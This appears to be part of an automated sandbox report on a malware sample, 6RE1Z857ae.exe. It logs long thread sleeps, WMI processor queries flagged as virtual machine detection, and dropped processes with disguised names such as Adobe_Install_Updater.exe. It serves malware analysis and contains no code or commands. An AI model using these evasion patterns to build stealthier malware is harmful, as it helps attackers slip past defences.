Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -98327s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -98218s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -98109s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -97999s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -97890s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -97779s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -97672s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -97555s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -97453s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -97340s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -97234s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -97125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -97015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -96906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -96796s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -96687s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -96577s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -96468s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe TID: 1524 Thread sleep time: -96359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2860 Thread sleep count: 4205 > 30
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -99797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 4500 Thread sleep count: 3996 > 30
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -99666s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -99557s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -99443s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -99323s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -98770s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -98625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -98516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -98391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -98266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -98147s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -98031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -97918s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -97808s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -97663s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -97527s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -97414s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -97297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -97188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -97077s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -96969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -96860s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -96735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -96610s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -96218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -96106s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -96000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -95891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -95781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -95672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -95563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -95453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -95344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -95219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -95110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -94985s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -94860s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -94735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -94610s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -94485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe TID: 2804 Thread sleep time: -94360s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5232 Thread sleep time: -75000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7640 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7272 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 5376 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204 Thread sleep count: 3527 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -99813s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7204 Thread sleep count: 4608 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -99672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -99559s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -99453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -99344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -99233s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -99125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -99016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -98906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -98797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -98687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -98374s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -98262s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -98156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -98047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -97937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -97828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -97719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -97609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -97500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -97391s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -97281s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -97172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -97063s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -96953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -96844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -96719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -96609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -96500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -96366s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -96247s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -95921s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -95563s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -95422s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -95312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -95203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -95093s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -94984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -94875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7180 Thread sleep time: -94766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7536 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7672 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7896 Thread sleep count: 3218 > 30
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -99843s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7920 Thread sleep count: 5004 > 30
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -99730s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -99623s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -99515s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -99406s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -99296s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -99164s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -99015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -98763s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -98656s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -98547s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -98437s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -98328s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -98218s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -98109s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -98000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -97890s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -97781s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -97671s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -97562s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -97453s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -97343s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -97234s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -97112s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -96984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -96875s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -96765s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -96652s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -96519s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -96281s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -95984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -95796s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -95684s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -95578s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -95468s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -95359s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -95250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -95137s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -95016s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -94906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -94796s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -94636s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 7888 Thread sleep time: -94531s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -36893488147419080s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8120 Thread sleep count: 3311 > 30
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8112 Thread sleep count: 6511 > 30
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -99874s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -99547s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -99198s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -98609s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -98481s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -98359s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -98232s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -98083s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -97954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -97812s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -97703s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -97593s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -97462s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -97344s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -97219s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -97107s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -96984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -96875s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -96765s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -96656s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -96547s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -96437s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -96287s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -96164s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -96044s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -95922s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -95797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -95676s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -95547s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -95437s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -95328s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -95219s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -95094s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -94984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -94873s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -94765s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -94643s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -94516s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -94391s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -94266s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -94156s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -94047s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -93937s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -93828s >= -30000s
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe TID: 8092 Thread sleep time: -93714s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8176 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7376 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 99877 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 99766 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 99656 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 99497 Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Thread delayed: delay time: 99391 Jump to behavior
